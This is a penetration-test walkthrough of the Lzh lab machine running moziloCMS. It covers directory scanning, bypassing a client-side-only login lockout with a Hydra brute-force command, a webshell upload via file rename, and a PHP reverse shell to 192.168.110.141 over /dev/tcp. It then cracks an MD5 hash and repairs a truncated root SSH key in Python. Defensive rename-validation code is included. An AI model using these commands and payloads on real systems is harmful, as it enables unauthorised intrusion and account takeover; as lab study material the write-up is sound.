This article documents a penetration test of the Lzh target machine. Directory scanning turned up backup.zip, a copy of the site source, which identified the target as moziloCMS. After too many failed logins the admin form is blocked, but the block is only a disabled submit button in the HTML, so Hydra was pointed straight at the POST endpoint and recovered the password Admin123. Once logged in, the CMS's file manager was used to upload a .jpg containing a PHP reverse shell and rename it to .php, giving an initial shell as www-data. A hash for the welcome user was found in the CMS configuration file, and the welcome home directory held a root SSH private key missing its first three base64 characters. Because every OpenSSH-format key begins with the fixed openssh-key-v1\0 header, the missing characters could be reconstructed from its base64 encoding; the repaired key gave root.

Information Gathering

# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/

403   280B   http://192.168.110.133/.ht_wsr.txt
403   280B   http://192.168.110.133/.htaccess_extra
403   280B   http://192.168.110.133/.htaccess.orig
403   280B   http://192.168.110.133/.htaccess_sc
403   280B   http://192.168.110.133/.htaccess_orig
403   280B   http://192.168.110.133/.htaccessBAK
403   280B   http://192.168.110.133/.htaccess.sample
403   280B   http://192.168.110.133/.htaccess.bak1
403   280B   http://192.168.110.133/.htaccessOLD2
403   280B   http://192.168.110.133/.htaccessOLD
403   280B   http://192.168.110.133/.htaccess.save
403   280B   http://192.168.110.133/.htm
403   280B   http://192.168.110.133/.htpasswd_test
403   280B   http://192.168.110.133/.html
403   280B   http://192.168.110.133/.httr-oauth
403   280B   http://192.168.110.133/.htpasswds
403   280B   http://192.168.110.133/.php
200     3MB  http://192.168.110.133/backup.zip
403   280B   http://192.168.110.133/server-status/
403   280B   http://192.168.110.133/server-status

Vulnerability Analysis

backup.zip is a backup of the web root. Its contents identify the site as moziloCMS 3.0-3.0.1. The weakness used here is in the admin file manager: the upload filter is satisfied by an image extension, but the rename function then accepts any new name, including .php, after which Apache executes the file. The steps, as documented for that version:

1. Log in as an administrator
2. Access the "Files" section via the left menu
3. Create a .jpg file containing PHP Web Shell content
4. Upload the file to the server via the upload icon and save it
5. Rename the file to .php on the web server and save
6. Access the Web Shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
(this is the path from the reference write-up; on a real target substitute the CMS install directory and the category the file was uploaded into, here /mozilo/kategorien/<category>/dateien/, where <category> is whatever category was selected in the file manager)
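As an added illustration (my own code, not from moziloCMS or from the original write-up), here is the server-side check that the rename step above is missing, rendered in Python with an assumed extension allowlist. The vulnerable behaviour is the one-line function that trusts the requested name; the hardened version refuses executable extensions anywhere in the dotted chain (so revshell.php.jpg is refused along with revshell.php), names containing path components, and dotfiles such as .htaccess.

```python
import os
import re

# Extensions the file manager accepts for uploads and renames (assumed policy for this example).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions an Apache+PHP host may hand to an interpreter or treat as configuration.
# Rejected anywhere in the name, because AddHandler-style configs match any extension
# in the chain, not only the last one.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps",
                  "cgi", "pl", "py", "sh", "htaccess", "htpasswd"}
# First character must be alphanumeric (no .htaccess), then a conservative character set.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class RenameRejected(ValueError):
    """Raised when a requested target name must not be honoured."""


def vulnerable_rename_target(old_name, new_name):
    """What the exploited file manager effectively does: trust the new name as given."""
    return new_name


def hardened_rename_target(old_name, new_name):
    """Return new_name if renaming old_name to it is safe, else raise RenameRejected.

    old_name is kept for symmetry with a file manager's rename API; the decision
    depends only on the requested name.  Checks, in order: no path components,
    conservative character set with no leading dot, at least one extension, no
    executable extension anywhere in the dotted chain, final extension allowlisted.
    """
    if new_name in ("", ".", "..") or os.path.basename(new_name) != new_name:
        raise RenameRejected("path components are not allowed: %r" % new_name)
    if not SAFE_NAME.match(new_name):
        raise RenameRejected("disallowed characters or leading dot: %r" % new_name)
    parts = new_name.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise RenameRejected("a file extension is required: %r" % new_name)
    chain = parts[1:]
    bad = [ext for ext in chain if ext in EXECUTABLE_EXT]
    if bad:
        raise RenameRejected("executable extension .%s in %r" % (bad[0], new_name))
    if chain[-1] not in ALLOWED_EXT:
        raise RenameRejected("extension .%s is not on the allowlist" % chain[-1])
    return new_name


def is_rejected(old_name, new_name):
    """True if the hardened check refuses the rename (convenience for tests/demos)."""
    try:
        hardened_rename_target(old_name, new_name)
        return False
    except RenameRejected:
        return True


def classify(old_name, candidates):
    """Map each candidate new name to 'allowed' or 'rejected: <reason>'."""
    result = {}
    for name in candidates:
        try:
            hardened_rename_target(old_name, name)
            result[name] = "allowed"
        except RenameRejected as exc:
            result[name] = "rejected: " + str(exc)
    return result


if __name__ == "__main__":
    # Constructed candidate names, including the ones from the exploit steps above.
    for name, verdict in classify("revshell.jpg", ["revshell.php", "revshell.phtml",
                                                   "revshell.php.jpg", ".htaccess",
                                                   "../x.jpg", "photo.JPG"]).items():
        print("%-18s %s" % (name, verdict))
```

The same rule set applies whatever language the file manager is written in. Because rename handlers are routinely forgotten when upload filters are written, a second layer is to turn script execution off in the upload directory at the web server itself (for Apache with mod_php, for example php_admin_flag engine off, or a FilesMatch block with Require all denied for .php names in that directory).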
On this target the CMS is installed under /mozilo/:

http://192.168.110.133/mozilo/         # site root
http://192.168.110.133/mozilo/admin/   # admin login page

After too many failed logins the admin page shows:

Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often.

The server-side login check in the CMS source looks like this:
// Logindaten überprüfen (check login data): called with the submitted username and
// password; returns true for either the main admin account or the optional second account.
// Nothing here counts failed attempts or enforces a lockout.
function checkLoginData($user, $pass) {
    global $loginpassword;
    require_once(BASE_DIR_CMS.'PasswordHash.php');
    // phpass hasher (iteration count log2 = 8, non-portable hashes preferred)
    $t_hasher = new PasswordHash(8, FALSE);

    // main admin account: "name" / "pw"
    if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
        return true;
    // second account: "username" / "userpw", only if that username is longer than 4 characters
    } elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
        return true;
    } else {
        return false;   // login failed
    }
}

The lockout is enforced in the browser only: the server just renders the submit button disabled.

<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">

A client that never renders the form (Hydra, curl) is unaffected, so the password can be brute-forced straight against the POST endpoint. Hydra sends the same three fields the form posts (username, password, login=Login); a 302 response marks a successful login (S=302), while a failed attempt returns the login page again. With -l admin the username is fixed, so it is written literally rather than as ^USER^:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I

Result: admin:Admin123, which logs into the backend.

Exploitation

Prepare the payload, a PHP reverse shell pointing back at the attacker host 192.168.110.141 (with a listener such as nc -lvnp 4444 waiting there):

<?php
// revshell.php: upload as revshell.jpg, then rename to revshell.php in the file manager
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>

Following the steps above (upload as .jpg, rename to .php, request the file under kategorien/<category>/dateien/) gives a shell as www-data. Enumerating users points to welcome, and grepping the web root for that name turns up a hash in the CMS config:

www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php:    // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt:    This is free software, and you are welcome to redistribute it

The 32 hex characters have the shape of an unsalted MD5 digest; cracked offline (hashcat -m 0 or john --format=raw-md5), it yields the welcome user's password, which is then used to log in as welcome. This is the step where knowing the site's password policy up front would have saved time.

Privilege Escalation

The welcome home directory contains an id_rsa that is root's private key.

It does not load as-is: the first three characters of the base64 body are missing. The file is an OpenSSH-format private key, and the decoded blob of every such key starts with the fixed magic openssh-key-v1\0, so the base64 body always begins with the same characters:

welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=

The trailing = only reflects that the 14 bytes were encoded on their own; in a real key the next byte is the \0 terminator, so the body begins b3BlbnNzaC1rZXktdjEA with no padding. The damaged file should therefore start at lbnNzaC1rZXktdjEA..., and prepending the three missing characters b3B restores it. Keep the -----BEGIN OPENSSH PRIVATE KEY----- / -----END OPENSSH PRIVATE KEY----- armor lines, chmod 600 the file, confirm it parses with ssh-keygen -y -f id_rsa (which prints the public key only if the file is well-formed), then ssh -i id_rsa root@192.168.110.133 gives a root shell.
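The following is an added example (my own code, not from the original write-up or from OpenSSH) that automates the repair just described and then parses the cleartext header of the openssh-key-v1 blob (the PROTOCOL.key layout) to confirm the result: cipher and KDF name, number of keys and key type. It assumes the damage is a clean loss of leading characters, as on Lzh. The sample key it builds is constructed: structurally valid but cryptographically meaningless, cipher "none", ed25519-shaped, so the demo runs offline; it is not the Lzh key.

```python
import base64
import struct
import textwrap

# Every openssh-key-v1 blob starts with this 15-byte magic, so the base64 body of
# every such key starts with the same 20 characters.
MAGIC = b"openssh-key-v1\x00"
MAGIC_B64 = base64.b64encode(MAGIC).decode()        # "b3BlbnNzaC1rZXktdjEA"
ARMOR_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
ARMOR_END = "-----END OPENSSH PRIVATE KEY-----"


def strip_armor(text):
    """Base64 body of a key file with armor lines, blank lines and whitespace removed."""
    lines = (ln.strip() for ln in text.splitlines())
    return "".join(ln for ln in lines if ln and not ln.startswith("-----"))


def repair_body(body):
    """Restore base64 characters missing from the front of an openssh-key-v1 body.

    The smallest k such that body starts with MAGIC_B64[k:] is the number of missing
    characters; prepend MAGIC_B64[:k].  A padded base64 body is always a multiple of
    4 characters, which rejects alignments that cannot be right.  Losing more than
    the whole magic is unrecoverable this way: no fixed text is left to align against.
    """
    for k in range(len(MAGIC_B64)):
        if body.startswith(MAGIC_B64[k:]):
            fixed = MAGIC_B64[:k] + body
            if len(fixed) % 4:
                raise ValueError("length not a multiple of 4 after adding %d chars; "
                                 "damage is not a simple leading truncation" % k)
            return fixed
    raise ValueError("no recognisable openssh-key-v1 prefix; cannot align")


def _read_string(blob, off):
    """Read one SSH 'string' (uint32 big-endian length + bytes) at offset off."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def parse_header(blob):
    """Parse the cleartext header: magic, string cipher, string kdf, string kdfoptions,
    uint32 nkeys, nkeys * string publickey, string private-section."""
    if not blob.startswith(MAGIC):
        raise ValueError("missing openssh-key-v1 magic")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    pubkeys = []
    for _ in range(nkeys):
        pk, off = _read_string(blob, off)
        pubkeys.append(pk)
    priv, off = _read_string(blob, off)
    keytype = _read_string(pubkeys[0], 0)[0].decode() if pubkeys else ""
    return {"cipher": cipher.decode(), "kdf": kdf.decode(), "nkeys": nkeys,
            "keytype": keytype, "encrypted": cipher != b"none", "private_len": len(priv)}


def to_pem(body):
    """Re-armor a base64 body the way ssh-keygen writes it (70-character lines)."""
    return "\n".join([ARMOR_BEGIN, *textwrap.wrap(body, 70), ARMOR_END]) + "\n"


def repair_key_file(text):
    """Repair a leading-truncated key file; return (fixed PEM text, parsed header)."""
    body = repair_body(strip_armor(text))
    header = parse_header(base64.b64decode(body, validate=True))
    return to_pem(body), header


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def build_sample_key():
    """Constructed ed25519-shaped blob, cipher 'none': valid layout, meaningless key material."""
    pub = _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x11" * 32)
    check = b"\x01\x02\x03\x04"                       # the two equal check ints
    priv = check + check + pub + _ssh_string(b"\x22" * 64) + _ssh_string(b"root@Lzh")
    pad = (-len(priv)) % 8                            # block size for cipher "none" is 8
    priv += bytes(range(1, pad + 1))                  # padding bytes 1, 2, 3, ...
    return (MAGIC + _ssh_string(b"none") + _ssh_string(b"none") + _ssh_string(b"")
            + struct.pack(">I", 1) + _ssh_string(pub) + _ssh_string(priv))


if __name__ == "__main__":
    good = base64.b64encode(build_sample_key()).decode()
    damaged = to_pem(good[3:])                        # same damage as the Lzh key
    fixed_pem, header = repair_key_file(damaged)
    print(header)
    print(fixed_pem)
```

On the target, write the returned PEM text over id_rsa, chmod 600 it, and let ssh-keygen -y -f id_rsa be the final arbiter: the parser above only checks the cleartext header, while ssh-keygen also validates the private section. A header reporting a cipher other than "none" means the key is passphrase-protected and repairing the base64 alone is not enough.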

Lessons Learned

I did not read the registration source code carefully, so I was unaware of the password policy; knowing it earlier would have narrowed the wordlist used to recover the welcome password.